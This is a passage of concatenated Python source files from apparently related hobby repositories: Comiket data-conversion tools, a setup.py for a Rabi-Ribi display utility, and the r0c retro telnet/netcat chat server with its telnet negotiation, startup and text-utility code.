romaji = romkan.to_roma(romaji) entry = { "loc": str(nday) + v["loc"], "kan": v["cirnam1"], "rom": romaji, "x": v["x"], "y": v["y"], } if v["x13"] or v["x14"]: print(v) print(v["x13"]) print(v["x14"]) print(" !!!!!!!!!!!!!!!!!!!\n") urls = [] for k in ["urlmain", "urlcata", "urlcirc", "urltwit", "urlpxiv"]: url = v[k] if ( "://webcatalog.circle.ms/Circle/" in url or "://portal.circle.ms/Circle/Index" in url or len(url) < 5 or url in urls ): continue urls.append(url) if urls: entry["url"] = urls ret.append(entry) with open("../bp/lkrxy{}.json".format(nday), "wb") as f: f.write( json.dumps(ret, sort_keys=True) .replace('"}, {"kan": "', '"},\n{"kan": "') .encode("utf-8") ) main() ``` #### File: battleplan/tools/db2json.py ```python import os import sys import csv import gzip import codecs import operator import romkan import jaconv import html import unicodedata import json import sqlite3 SJIS_WARN = False s1 = u"アイウエオカキクケコ" # a=wall s2 = u"サシスセソタチツテト" s3 = u"ナニヌネノハヒフヘホ" # na=wall s4 = u"マミムメモヤユヨラリ" w1a = u"れぬねのはひふへほまみむめも" # re=wall w1b = u"やゆよらりる" w2a = u"あくけこさしすせそたちつてと" # a=wall w2b = u"いうえおかき" w3a = u"ABCDEFGHIJKL" # a=wall w3b = u"MNOPQR" all_rows = w3a + w3b + w2a + w2b + w1a + w1b + s1 + s2 + s3 + s4 all_halls = { "s1": s1, "s2": s2, "s3": s3, "s4": s4, "w1a": w1a, "w1b": w1b, "w2a": w2a, "w2b": w2b, "w3a": w3a, "w3b": w3b, } all_days = ['土', '日', '月', '火'] def main(): conn = sqlite3.connect(sys.argv[1]) # conn.text_factory = lambda x: str(x, "sjis") cur = conn.cursor() cur.execute("select code, name from ComiketGenre") rows = cur.fetchall() for row in rows: print(row) cur = conn.cursor() cur.execute( "select id, day, blockId, spaceNo, spaceNoSub, genreId, circleName, circleKana from ComiketCircle" ) rows = cur.fetchall() for row in rows: print(row) main() ``` #### File: battleplan/tools/xor.py ```python keys = [ b'\<KEY>', #<KEY>', ] import os import sys def main(): with open(sys.argv[1], 'rb') as f: while True: for key in keys: dbuf = f.read(0x400) if len(dbuf) == 0: return kbuf = key[:] while len(kbuf) < len(dbuf): kbuf += key sys.stdout.buffer.write( bytes(a ^ b for a, b in zip(dbuf, kbuf))) main() ```
{ "source": "9001/md_rbrb", "score": 2 }
#### File: 9001/md_rbrb/setup.py ```python from __future__ import print_function import io import os import sys from glob import glob from shutil import rmtree try: # need setuptools to build wheel from setuptools import setup, Command setuptools_available = True except ImportError: # works in a pinch from distutils.core import setup, Command setuptools_available = False from distutils.spawn import spawn if 'bdist_wheel' in sys.argv and not setuptools_available: print('cannot build wheel without setuptools') sys.exit(1) NAME = 'md_rbrb' VERSION = None data_files = [ ('share/doc/md_rbrb', ['README.md','README.rst','LICENSE']) ] manifest = '' for dontcare, files in data_files: for fn in files: manifest += "include {0}\n".format(fn) here = os.path.abspath(os.path.dirname(__file__)) with open(here + '/MANIFEST.in', 'wb') as f: f.write(manifest.encode('utf-8')) with open(here + '/md_rbrb.py', 'rb') as f: for ln in [x.decode('utf-8') for x in f]: if ln.startswith('__version__'): exec(ln) break try: LONG_DESCRIPTION = '' LDCT = '' with open(here + '/README.rst', 'rb') as f: txt = f.read().decode('utf-8') #txt = txt[txt.find('`'):] LONG_DESCRIPTION = txt LDCT = 'text/x-rst' except: print('\n### could not open README.rst ###\n') with open(here + '/README.md', 'rb') as f: txt = f.read().decode('utf-8') LONG_DESCRIPTION = txt LDCT = 'text/markdown' class clean2(Command): description = 'Cleans the source tree' user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): os.system('{0} setup.py clean --all'.format(sys.executable)) try: rmtree('./dist') except: pass try: rmtree('./md_rbrb.egg-info') except: pass nuke = [] for (dirpath, dirnames, filenames) in os.walk('.'): for fn in filenames: if fn.endswith('.rst') \ or fn.endswith('.pyc') \ or fn.endswith('.pyo') \ or fn.endswith('.pyd') \ or fn.startswith('MANIFEST'): nuke.append(dirpath + '/' + fn) for fn in nuke: os.unlink(fn) class rstconv(Command): description = 'Converts markdown to rst' user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): self.proc_dir('.') self.proc_dir('docs') def proc_dir(self, path): import m2r for (dirpath, dirnames, filenames) in os.walk(path): dirnames.sort() for fn in sorted(filenames): fn = dirpath + '/' + fn if not fn.endswith('.md'): continue rst_fn = fn[:-3] + '.rst' with open(fn, 'rb') as f: md = f.read().decode('utf-8') for kw in ['docs/help-']: md = md.replace('({0}'.format(kw), '(https://github.com/9001/r0c/blob/master/{0}'.format(kw)) for kw in ['docs','clients']: md = md.replace('({0}/'.format(kw), '(https://ocv.me/static/r0c/{0}/'.format(kw)) md = md.replace('* **[', '* [').replace(')** <-', ') <-') rst = m2r.convert(md) rst = rst.replace(':raw-html-m2r:`<del>', ':sub:`') rst = rst.replace('</del>`', '`') with open(rst_fn, 'wb') as f: f.write(rst.encode('utf-8')) args = { 'name' : NAME, 'version' : __version__, 'description' : 'multilanguage Rabi-Ribi display', 'long_description' : LONG_DESCRIPTION, 'long_description_content_type' : LDCT, 'author' : 'ed', 'author_email' : '<EMAIL>', 'url' : 'https://github.com/9001/md_rbrb', 'license' : 'MIT', 'data_files' : data_files, 'classifiers' : [ 'Development Status :: 5 - Production/Stable', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.0', 'Programming Language :: Python :: 3.1', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: Implementation :: CPython', 'Programming Language :: Python :: Implementation :: PyPy', 'Topic :: Games/Entertainment :: Side-Scrolling/Arcade Games', 'Intended Audience :: End Users/Desktop', 'Operating System :: Microsoft :: Windows', 'Environment :: Console' ], 'cmdclass' : { 'rstconv': rstconv, 'clean2': clean2 } } if setuptools_available: args.update({ 'install_requires' : [], 'include_package_data' : True, 'py_modules' : ['md_rbrb'], 'entry_points' : """ [console_scripts] md_rbrb = md_rbrb:main """ }) else: args.update({ 'packages' : ['md_rbrb'], 'scripts' : ['bin/md_rbrb'] }) #import pprint #pprint.PrettyPrinter().pprint(args) #sys.exit(0) setup(**args) ```
{ "source": "9001/r0c", "score": 2 }
#### File: r0c/r0c/itelnet.py ```python from __future__ import print_function from .__init__ import EP, PY2 from . import util as Util from . import ivt100 as Ivt100 import time import struct print = Util.print # from net::telnet (telnet.rb) doc by <NAME> and <NAME> # OPT_([^ ]*) .*("\\x..") # (.*) # \2 = "\1 \3", subjects = { b"\x00": "BINARY (Binary Transmission)", b"\x01": "ECHO (Echo)", b"\x02": "RCP (Reconnection)", b"\x03": "SGA (Suppress Go Ahead)", b"\x04": "NAMS (Approx Message Size Negotiation)", b"\x05": "STATUS (Status)", b"\x06": "TM (Timing Mark)", b"\x07": "RCTE (Remote Controlled Trans and Echo)", b"\x08": "NAOL (Output Line Width)", b"\x09": "NAOP (Output Page Size)", b"\x0a": "NAOCRD (Output Carriage-Return Disposition)", b"\x0b": "NAOHTS (Output Horizontal Tab Stops)", b"\x0c": "NAOHTD (Output Horizontal Tab Disposition)", b"\x0d": "NAOFFD (Output Formfeed Disposition)", b"\x0e": "NAOVTS (Output Vertical Tabstops)", b"\x0f": "NAOVTD (Output Vertical Tab Disposition)", b"\x10": "NAOLFD (Output Linefeed Disposition)", b"\x11": "XASCII (Extended ASCII)", b"\x12": "LOGOUT (Logout)", b"\x13": "BM (Byte Macro)", b"\x14": "DET (Data Entry Terminal)", b"\x15": "SUPDUP (SUPDUP)", b"\x16": "SUPDUPOUTPUT (SUPDUP Output)", b"\x17": "SNDLOC (Send Location)", b"\x18": "TTYPE (Terminal Type)", b"\x19": "EOR (End of Record)", b"\x1a": "TUID (TACACS User Identification)", b"\x1b": "OUTMRK (Output Marking)", b"\x1c": "TTYLOC (Terminal Location Number)", b"\x1d": "3270REGIME (Telnet 3270 Regime)", b"\x1e": "X3PAD (X.3 PAD)", b"\x1f": "NAWS (Negotiate About Window Size)", b"\x20": "TSPEED (Terminal Speed)", b"\x21": "LFLOW (Remote Flow Control)", b"\x22": "LINEMODE (Linemode)", b"\x23": "XDISPLOC (X Display Location)", b"\x24": "OLD_ENVIRON (Environment Option)", b"\x25": "AUTHENTICATION (Authentication Option)", b"\x26": "ENCRYPT (Encryption Option)", b"\x27": "NEW_ENVIRON (New Environment Option)", b"\xff": "EXOPL (Extended-Options-List)", } verbs = {b"\xfe": "DONT", b"\xfd": "DO", b"\xfc": "WONT", b"\xfb": "WILL"} xff = b"\xff" xf0 = b"\xf0" neg_will = neg_wont = neg_dont = initial_neg = None def init(ar): global subjects, verbs, xff, xf0, neg_will, neg_wont, neg_dont, initial_neg if not ar.linemode: # standard operation procedure; # we'll handle all rendering neg_will = [ b"\x1f", # negotiate window size b"\x01", # echo b"\x03", # suppress go-ahead ] neg_wont = [] neg_dont = [b"\x25"] # authentication initial_neg = b"" initial_neg += b"\xff\xfb\x03" # will sga initial_neg += b"\xff\xfb\x01" # will echo initial_neg += b"\xff\xfd\x1f" # do naws else: # debug / negative test; # have client linebuffer # (reminder that windows telnet refuses to linemode) # (but dont use that to detect telnet.exe because some clients kinda # require an exact negotiation order and this permutation works) neg_will = [b"\x1f"] # negotiate window size neg_wont = [b"\x01", b"\x03"] # echo # suppress go-ahead initial_neg = b"" # initial_neg += b'\xff\xfc\x03' # won't sga # initial_neg += b'\xff\xfc\x01' # won't echo initial_neg += b"\xff\xfd\x01" # do echo initial_neg += b"\xff\xfd\x22" # do linemode initial_neg += b"\xff\xfd\x1f" # do naws if not PY2: xff = 0xFF xf0 = 0xF0 def dict_2to3(src): ret = {} for k, v in src.items(): ret[k[0]] = v return ret def list_2to3(src): ret = [] for v in src: ret.append(v[0]) return ret verbs = dict_2to3(verbs) subjects = dict_2to3(subjects) neg_will = list_2to3(neg_will) neg_wont = list_2to3(neg_wont) class TelnetServer(Ivt100.VT100_Server): def __init__(self, host, port, world, other_if): Ivt100.VT100_Server.__init__(self, host, port, world, other_if) self.user_config_path = EP.log + "cfg.telnet" def gen_remote(self, socket, addr, user): return TelnetClient(self, socket, addr, self.world, user) class TelnetClient(Ivt100.VT100_Client): def __init__(self, host, socket, address, world, user): Ivt100.VT100_Client.__init__(self, host, socket, address, world, user) # if self.ar.linemode: # self.y_input, self.y_status = self.y_status, self.y_input self.neg_done = [] self.replies.put(initial_neg) def handle_read(self): with self.world.mutex: if self.dead: print("\033[1;31mXXX reading when dead\033[0m") return try: data = self.socket.recv(8192) if not data: raise Exception() except: self.handle_close() return if self.ar.hex_rx: Util.hexdump(data, "-->>") if self.wire_log and self.ar.log_rx: self.wire_log.write( "{0:.0f}\n".format(time.time() * 1000).encode("utf-8") ) Util.hexdump(data, ">", self.wire_log) self.in_bytes += data text_len = len(self.in_text) full_redraw = False while self.in_bytes: len_at_start = len(self.in_bytes) decode_until = len_at_start # if the codec allows \xff as the 1st byte of a rune, # make sure it doesn't consume it if not self.inband_will_fail_decode: ofs = self.in_bytes.find(b"\xff") if ofs >= 0: decode_until = ofs try: src = u"{0}".format(self.in_bytes[:decode_until].decode(self.codec)) # print('got {0} no prob'.format(src)) # print('got {0} runes: {1}'.format(len(src), # b2hex(src.encode('utf-8')))) self.in_bytes = self.in_bytes[decode_until:] except UnicodeDecodeError as uee: uee.start += self.uee_offset is_inband = ( decode_until > uee.start and self.in_bytes[uee.start] == xff ) is_partial = decode_until < uee.start + 6 and self.multibyte_codec if is_inband or is_partial: if self.ar.dbg and is_partial and not is_inband: print( "need more data to parse unicode codepoint at {0} in {1}/{2}".format( uee.start, decode_until, len(self.in_bytes) ) ) Util.hexdump( self.in_bytes[max(0, decode_until - 8) : decode_until], "XXX ", ) src = u"{0}".format( self.in_bytes[: uee.start].decode(self.codec) ) self.in_bytes = self.in_bytes[uee.start :] if is_partial and not is_inband: self.in_text += src break else: # it can't be helped print( "unparseable client data at {0} in {1}/{2}:".format( uee.start, decode_until, len(self.in_bytes) ) ) Util.hexdump(self.in_bytes, "XXX ") try: src = u"{0}".format( self.in_bytes[:decode_until].decode( self.codec, "backslashreplace" ) ) except: src = u"[ unfixable text corruption ]" # can happen in py2 self.in_bytes = self.in_bytes[decode_until:] self.in_text += src if self.wizard_stage is not None and len(self.in_text_full) < 1024: self.in_text_full += src if self.in_bytes and self.in_bytes[0] == xff: # cmd = b''.join([self.in_bytes[:3]]) cmd = self.in_bytes[:3] if len(cmd) < 3: print("need more data for generic negotiation") break self.num_telnet_negotiations += 1 if verbs.get(cmd[1]): self.in_bytes = self.in_bytes[3:] if not subjects.get(cmd[2]): m = "[X] subject not implemented: [{0}]" print(m.format(Util.b2hex(cmd))) continue if self.ar.dbg: print( "-->> negote: {0} {1} {2}".format( Util.b2hex(cmd), verbs.get(cmd[1]), subjects.get(cmd[2]), ) ) response = None if cmd in self.neg_done: if self.ar.dbg: print("-><- n.loop: {0}".format(Util.b2hex(cmd))) elif cmd[:2] == b"\xff\xfe": # dont response = b"\xfc" # will not if cmd[2] in neg_will: response = b"\xfb" # will elif cmd[:2] == b"\xff\xfd": # do response = b"\xfb" # will if cmd[2] in neg_wont: response = b"\xfc" # will not if response is not None: if self.ar.dbg: print( "<<-- n.resp: {0} {1} -> {2}".format( Util.b2hex(cmd[:3]), verbs.get(cmd[1]), verbs.get(response[0]), ) ) self.replies.put(b"".join([b"\xff", response, cmd[2:3]])) self.neg_done.append(cmd) elif cmd[1] == b"\xfa"[0] and len(self.in_bytes) >= 3: eon = self.in_bytes.find(b"\xff\xf0") if eon <= 0: # print('invalid subnegotiation:') # hexdump(self.in_bytes, 'XXX ') # self.in_bytes = self.in_bytes[0:0] print( "need more data for sub-negotiation: {0}".format( Util.b2hex(self.in_bytes) ) ) break else: # cmd = b''.join([self.in_bytes[:12]]) # at least 9 cmd = self.in_bytes[:eon] self.in_bytes = self.in_bytes[eon + 2 :] if self.ar.dbg: print("-->> subneg: {0}".format(Util.b2hex(cmd))) if cmd[2] == b"\x1f"[0]: full_redraw = True # spec says to send \xff\xff in place of \xff # for literals in negotiations, some clients do while True: ofs = cmd.find(b"\xff\xff") if ofs < 0: break cmd = cmd[:ofs] + cmd[ofs + 1 :] if self.ar.dbg: print(" : {0}".format(Util.b2hex(cmd))) self.set_term_size(*struct.unpack(">HH", cmd[3:7])) else: print("=== invalid negotiation:") Util.hexdump(self.in_bytes, "XXX ") self.in_bytes = self.in_bytes[0:0] if len(self.in_bytes) == len_at_start: print("=== unhandled data from client:") Util.hexdump(self.in_bytes, "XXX ") self.in_bytes = self.in_bytes[0:0] break self.read_cb(full_redraw, len(self.in_text) - text_len) ``` #### File: r0c/r0c/__main__.py ```python from __future__ import print_function from .__version__ import S_VERSION from .__init__ import EP, WINDOWS, COLORS, unicode from . import util as Util from . import inetcat as Inetcat from . import itelnet as Itelnet from . import world as World import os import sys import time import signal import select import threading from datetime import datetime print = Util.print """r0c.py: retr0chat Telnet/Netcat Server""" __author__ = "ed <<EMAIL>>" __credits__ = ["stackoverflow.com"] __license__ = "MIT" __copyright__ = 2018 __url__ = "https://github.com/9001/r0c" if "r0c" not in sys.modules: print( "\r\n retr0chat must be launched as a module.\r\n in the project root, run this:\r\n\r\n python3 -m r0c\r\n" ) sys.exit(1) def optgen(ap, pwd): ac = ap u = unicode pt, pn = [23, 531] if WINDOWS or not os.getuid() else [2323, 1531] # fmt: off ac.add_argument("-i", metavar="IP", type=u, default="0.0.0.0", help="address to listen on") ac.add_argument("-pt", type=int, default=pt, help="telnet port (disable with 0)") ac.add_argument("-pn", type=int, default=pn, help="netcat port (disable with 0)") ac.add_argument("-pw", metavar="PWD", type=u, default=pwd, help="admin password") ac.add_argument("--nsalt", metavar="TXT", type=u, default="lammo/", help="salt for generated nicknames based on IP") ac = ap.add_argument_group("logging") ac.add_argument("--log-rx", action="store_true", help="log incoming traffic from clients") ac.add_argument("--log-tx", action="store_true", help="log outgoing traffic to clients") ac.add_argument("--rot-msg", metavar="N", type=int, default=131072, help="max num msgs per logfile") ac = ap.add_argument_group("perf") ac.add_argument("--hist-rd", metavar="N", type=int, default=65535, help="max num msgs to load from disk when joining a channel") ac.add_argument("--hist-mem", metavar="N", type=int, default=98303, help="max num msgs to keep in channel scrollback") ac.add_argument("--hist-tsz", metavar="N", type=int, default=16384, help="num msgs to discard when chat exceeds hist-mem") ac = ap.add_argument_group("debug") ac.add_argument("--dbg", action="store_true", help="show negotiations etc") ac.add_argument("--hex-rx", action="store_true", help="print incoming traffic from clients") ac.add_argument("--hex-tx", action="store_true", help="print outgoing traffic to clients") ac.add_argument("--hex-lim", metavar="N", type=int, default=128, help="filter packets larger than N bytes from being hexdumped") ac.add_argument("--hex-w", metavar="N", type=int, default=16, help="width of the hexdump, in bytes per line, mod-8") ac.add_argument("--thr-mon", action="store_true", help="start monitoring threads on ctrl-c") ac.add_argument("--linemode", action="store_true", help="force clients into linemode (to debug linemode UI)") ac.add_argument("--bench", action="store_true", help="dump statistics every 2 sec") # fmt: on class Fargparse(object): def __init__(self): pass def add_argument_group(self, *a, **ka): return self def add_argument(self, opt, default=False, **ka): setattr(self, opt.lstrip("-").replace("-", "_"), default) def run_fap(argv, pwd): ap = Fargparse() optgen(ap, pwd) if "-h" in unicode(argv + [""])[1]: print() print("arg 1: Telnet port (0=disable), default: {0}".format(ap.pt)) print("arg 2: NetCat port (0=disable), default: {0}".format(ap.pn)) print("arg 3: admin password, default: {0}".format(ap.pw)) print() sys.exit(0) try: setattr(ap, "pt", int(argv[1])) setattr(ap, "pn", int(argv[2])) setattr(ap, "pw", unicode(argv[3])) except: pass return ap try: import argparse class RiceFormatter(argparse.HelpFormatter): def _get_help_string(self, action): """ same as ArgumentDefaultsHelpFormatter(HelpFormatter) except the help += [...] line now has colors """ fmt = "\033[36m (default: \033[35m%(default)s\033[36m)\033[0m" if not COLORS: fmt = " (default: %(default)s)" help = action.help if "%(default)" not in action.help: if action.default is not argparse.SUPPRESS: defaulting_nargs = [argparse.OPTIONAL, argparse.ZERO_OR_MORE] if action.option_strings or action.nargs in defaulting_nargs: help += fmt return help def _fill_text(self, text, width, indent): """same as RawDescriptionHelpFormatter(HelpFormatter)""" return "".join(indent + line + "\n" for line in text.splitlines()) class Dodge11874(RiceFormatter): def __init__(self, *args, **kwargs): kwargs["width"] = 9003 super(Dodge11874, self).__init__(*args, **kwargs) def run_ap(argv, pwd): throw = False for formatter in [RiceFormatter, Dodge11874]: try: ap = argparse.ArgumentParser(formatter_class=formatter, prog="r0c") optgen(ap, pwd) return ap.parse_args(args=argv[1:]) except AssertionError: if throw: raise throw = True except: run_ap = run_fap class Core(object): def __init__(self): pass def start(self, argv=None): if WINDOWS and COLORS: os.system("rem") # best girl if argv is None: argv = sys.argv for d in ["pm", "chan", "wire"]: try: os.makedirs(EP.log + d) except: pass print(" * r0c {0}, py {1}".format(S_VERSION, Util.host_os())) pwd = "<PASSWORD>" pwd_file = os.path.join(EP.app, "password.txt") if os.path.isfile(pwd_file): print(" * Password from " + pwd_file) with open(pwd_file, "rb") as f: pwd = f.read().decode("utf-8").strip() # old argv syntax compat try: _ = int(argv[1]) rap = run_fap except: rap = run_ap ar = self.ar = rap(argv, pwd) Util.HEX_WIDTH = ar.hex_w Itelnet.init(ar) for srv, port in [["Telnet", ar.pt], ["NetCat", ar.pn]]: if port: print(" * {0} server on port {1}".format(srv, port)) else: print(" * {0} server disabled".format(srv)) if ar.pw == "hunter2": print("\033[1;31m") print(" using the default password;") print(" change it with argument -pw") print(" or save it here: " + pwd_file) print("\033[0m") print(" * Logs at " + EP.log) Util.compat_chans_in_root() self.stopping = 0 self.threadmon = False self.shutdown_flag = threading.Event() Util.py26_threading_event_wait(self.shutdown_flag) print(" * Capturing ^C") for sig in [signal.SIGINT, signal.SIGTERM]: signal.signal(sig, self.signal_handler) print(" * Creating world") self.world = World.World(self) self.servers = [] if ar.pt: print(" * Starting Telnet server") self.telnet_server = Itelnet.TelnetServer(ar.i, ar.pt, self.world, ar.pn) self.servers.append(self.telnet_server) if ar.pn: print(" * Starting NetCat server") self.netcat_server = Inetcat.NetcatServer(ar.i, ar.pn, self.world, ar.pt) self.servers.append(self.netcat_server) print(" * Loading user configs") for server in self.servers: server.load_configs() print(" * Starting push driver") self.push_thr = threading.Thread( target=self.push_worker, args=(self.world, self.servers), name="push", ) # self.push_thr.daemon = True self.push_thr.start() print(" * Running") self.select_thr = threading.Thread(target=self.select_worker, name="selector") self.select_thr.daemon = True self.select_thr.start() return True def run(self): print(" * r0c is up ^^,") if not self.ar.bench: try: timeout = 69 if WINDOWS: # ctrl-c does not raise timeout = 0.69 while not self.shutdown_flag.wait(timeout): pass except: pass else: last_joins = 0 last_parts = 0 last_messages = 0 while not self.shutdown_flag.is_set(): for n in range(20): if self.shutdown_flag.is_set(): break time.sleep(0.1) print( "{0:.3f} j {1} p {2} m {3} d {4},{5},{6}".format( time.time(), self.world.num_joins, self.world.num_parts, self.world.num_messages, self.world.num_joins - last_joins, self.world.num_parts - last_parts, self.world.num_messages - last_messages, ) ) last_joins = self.world.num_joins last_parts = self.world.num_parts last_messages = self.world.num_messages # termiante refresh_chans self.world.dirty_ch = {} self.world.dirty_flag.set() with self.world.mutex: pass print(" * saving user configs") for server in self.servers: server.save_configs() print(" * terminating world") self.world.shutdown() print(" * selector cleanup") for server in self.servers: server.srv_sck.close() print(" * r0c is down") return True def select_worker(self): srvs = {} for iface in self.servers: srvs[iface.srv_sck] = iface sn = -1 sc = {} slow = {} # sck:cli fast = {} next_slow = 0 timeout = None while not self.shutdown_flag.is_set(): nsn = self.world.cserial if sn != nsn: sn = nsn sc = {} slow = {} fast = {} for srv in self.servers: for c in srv.clients: if c.slowmo_tx or c.wizard_stage is not None: slow[c.socket] = c else: fast[c.socket] = c sc[c.socket] = c timeout = 0.2 if slow else 0.34 if fast else 69 want_tx = [s for s, c in fast.items() if c.writable()] want_rx = [s for s, c in sc.items() if c.readable()] want_rx += list(srvs.keys()) now = time.time() if slow and now >= next_slow: next_slow = now + 0.18 for c in slow.values(): if c.slowmo_skips: c.slowmo_skips -= 1 want_tx += [ s for s, c in slow.items() if c.writable() and not c.slowmo_skips ] try: rxs, txs, _ = select.select(want_rx, want_tx, [], timeout) if self.stopping: break with self.world.mutex: if sn != self.world.cserial: continue for s in rxs: if s in srvs: srvs[s].handle_accept() else: sc[s].handle_read() for s in txs: sc[s].handle_write() except Exception as ex: if "Bad file descriptor" in str(ex): # print('osx bug ignored') continue Util.whoops() def push_worker(self, world, ifaces): last_action_ts = time.time() last_its = None last_date = None while not self.shutdown_flag.is_set(): if any(srv.clients for srv in self.servers): # sleep until the start of the next mod5 utc second while True: ts = time.time() its = int(ts / 5) * 5 if its != last_its: last_its = its break if ts - its < 4.99: if self.shutdown_flag.wait((5 - (ts - its))): break else: time.sleep(0.02) else: # less precision if there's nobody connected self.world.dirty_flag.wait(100) ts = time.time() last_its = int(ts / 5) * 5 with world.mutex: if self.stopping: break date = datetime.utcfromtimestamp(ts).strftime("%Y-%m-%d") if date != last_date: if last_date: world.broadcast_message( u"\033[36mday changed to \033[1m{0}".format(date), False ) last_date = date for iface in ifaces: for client in iface.clients: if client.handshake_sz: client.refresh(False) # print('next scheduled kick: {0}'.format('x' if iface.next_scheduled_kick is None else iface.next_scheduled_kick - ts)) if ( iface.next_scheduled_kick is not None and iface.next_scheduled_kick <= ts ): to_kick = [] next_min = None for sch in iface.scheduled_kicks: if sch[0] <= ts: to_kick.append(sch) else: if next_min is None or next_min > sch[0]: next_min = sch[0] for sch in to_kick: timeout, remote, msg = sch iface.scheduled_kicks.remove(sch) if remote in iface.clients: if msg is None: iface.part(remote) else: iface.part(remote, False) print(msg) iface.next_scheduled_kick = next_min if ts - last_action_ts >= 600: last_action_ts = ts # flush client configs for iface in ifaces: iface.save_configs() # flush wire logs if self.ar.log_rx or self.ar.log_tx: for client in iface.clients: if client.wire_log: try: client.wire_log.flush() except: Util.whoops() # flush chan logs for chan_list in [world.pub_ch, world.priv_ch]: for chan in chan_list: if chan.log_fh: try: chan.log_fh.flush() except: Util.whoops() print(" * terminated push_worker") def shutdown(self): # monitor_threads() self.stopping += 1 if self.stopping >= 3: os._exit(1) self.shutdown_flag.set() def signal_handler(self, sig, frame): if self.ar.thr_mon and not self.threadmon: self.threadmon = True Util.monitor_threads() else: self.shutdown() def start_r0c(argv): core = Core() try: if core.start(argv): return core.run() except SystemExit: raise except: Util.whoops() os._exit(1) def main(argv=None): mode = "normal" # mode = "profiler" # mode = 'test-ansi-annotation' # test_hexdump() if mode == "normal": if not start_r0c(argv): sys.exit(1) """ if mode == "profiler": print(" * PROFILER ENABLED") statfile = "profiler-results" import yappi yappi.start() start_r0c(argv) yappi.stop() fn_stats = yappi.get_func_stats() thr_stats = yappi.get_thread_stats() print() for ext in ["pstat", "callgrind", "ystat"]: print("writing {0}.{1}".format(statfile, ext)) fn_stats.save("{0}.{1}".format(statfile, ext), type=ext) with open("{0}.func".format(statfile), "w") as f: fn_stats.print_all(out=f) with open("{0}.thr".format(statfile), "w") as f: thr_stats.print_all(out=f) print("\n\n{0}\n func stats\n{0}\n".format("-" * 72)) fn_stats.print_all() print("\n\n{0}\n thread stats\n{0}\n".format("-" * 72)) thr_stats.print_all() if mode == "test-ansi-annotation": Util.test_ansi_annotation() """ if __name__ == "__main__": main() ``` #### File: r0c/r0c/util.py ```python from __future__ import print_function from .__init__ import EP, PY2, WINDOWS, COLORS, INTERP import traceback import threading import struct import time import sys import os import platform import itertools print_mutex = threading.Lock() if PY2: import __builtin__ as builtins else: import builtins HEX_WIDTH = 16 azAZ = u"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" BRI_256 = list( itertools.chain( range(35, 47), range(48, 52), range(70, 88), range(103, 124), range(132, 232), ) ) def print(*args, **kwargs): args = list(args) try: if not COLORS and u"\033" in args[0]: args[0] = strip_ansi(args[0]) except: pass with print_mutex: t = time.strftime("%H%M%S ") builtins.print( t + str(args[0] if args else u"").replace(u"\n", u"\n" + t), *args[1:], **kwargs ) def num(c): try: return int(c) except: return None def b2hex(data): if PY2: return " ".join(map(lambda b: format(ord(b), "02x"), data)) else: if type(data) is str: return " ".join(map(lambda b: format(ord(b), "02x"), data)) else: return " ".join(map(lambda b: format(b, "02x"), data)) def hexdump(pk, prefix="", file=None): if file is not None: line_fmt = u"{0} {2}{3}{4}" hex_width = 4 blk_width = 4 else: line_fmt = u"{0}{1:8x} {2}{3} {4}" hex_width = HEX_WIDTH blk_width = 8 lpk = len(pk) ofs = 0 hexofs = 0 hexlen = 0 hexstr = "" ascstr = "" ascstr_width = int(hex_width * 100 / 32.0 - 0.5) # 32h = 100a, 16h = 50a while ofs < lpk: hexstr += b2hex(pk[ofs : ofs + blk_width]) hexstr += " " if PY2: ascstr += "".join( map( lambda b: b if ord(b) >= 0x20 and ord(b) < 0x7F else ".", pk[ofs : ofs + blk_width], ) ) else: ascstr += "".join( map( lambda b: chr(b) if b >= 0x20 and b < 0x7F else ".", pk[ofs : ofs + blk_width], ) ) hexlen += blk_width ofs += blk_width if hexlen >= hex_width or ofs >= lpk: txt = line_fmt.format( prefix, hexofs, hexstr, u" " * (ascstr_width - len(hexstr)), ascstr ) if file is not None: file.write((txt + u"\n").encode("utf-8")) else: print(txt) hexofs = ofs hexstr = "" hexlen = 0 ascstr = "" else: hexstr += " " ascstr += " " def test_hexdump(): try: from StringIO import StringIO as bio except: from io import BytesIO as bio v = b"" for n in range(5): print() v += b"a" fobj = bio() hexdump(v, ">", fobj) print(fobj.getvalue().decode("utf-8").rstrip("\n") + "$") fobj.close() v = b"" for n in range(18): print() v += b"a" hexdump(v, ">") sys.exit(0) def trunc(txt, maxlen): eoc = azAZ ret = u"" clen = 0 pend = None counting = True for input_ofs, ch in enumerate(txt): # escape sequences can never contain ESC; # treat pend as regular text if so if ch == u"\033" and pend: clen += len(pend) ret += pend counting = True pend = None if not counting: ret += ch if ch in eoc: counting = True else: if pend: pend += ch if pend.startswith(u"\033["): counting = False else: clen += len(pend) counting = True ret += pend pend = None else: if ch == u"\033": pend = u"{0}".format(ch) else: ret += ch clen += 1 if clen >= maxlen: return [ret, txt[input_ofs:]] return [ret, u""] # adapted from trunc def strip_ansi(txt): eoc = azAZ ret = u"" pend = None counting = True for ch in txt: # escape sequences can never contain ESC; # treat pend as regular text if so if ch == u"\033" and pend: ret += pend counting = True pend = None if not counting: if ch in eoc: counting = True else: if pend: pend += ch if pend.startswith(u"\033["): counting = False else: ret += pend counting = True pend = None else: if ch == u"\033": pend = u"{0}".format(ch) else: ret += ch return ret # adapted from trunc def visual_length(txt): eoc = azAZ clen = 0 pend = None counting = True for ch in txt: # escape sequences can never contain ESC; # treat pend as regular text if so if ch == u"\033" and pend: clen += len(pend) counting = True pend = None if not counting: if ch in eoc: counting = True else: if pend: pend += ch if pend.startswith(u"\033["): counting = False else: clen += len(pend) counting = True pend = None else: if ch == u"\033": pend = u"{0}".format(ch) else: co = ord(ch) # the safe parts of latin1 and cp437 (no greek stuff) if ( co < 0x100 # ascii + lower half of latin1 or (co >= 0x2500 and co <= 0x25A0) # box drawings or (co >= 0x2800 and co <= 0x28FF) # braille ): clen += 1 else: # assume moonrunes or other double-width clen += 2 return clen # 83% the speed of visual_length, # good enough to stop maintaining it and swap w/ len(this) def visual_indices(txt): eoc = azAZ ret = [] pend_txt = None pend_ofs = [] counting = 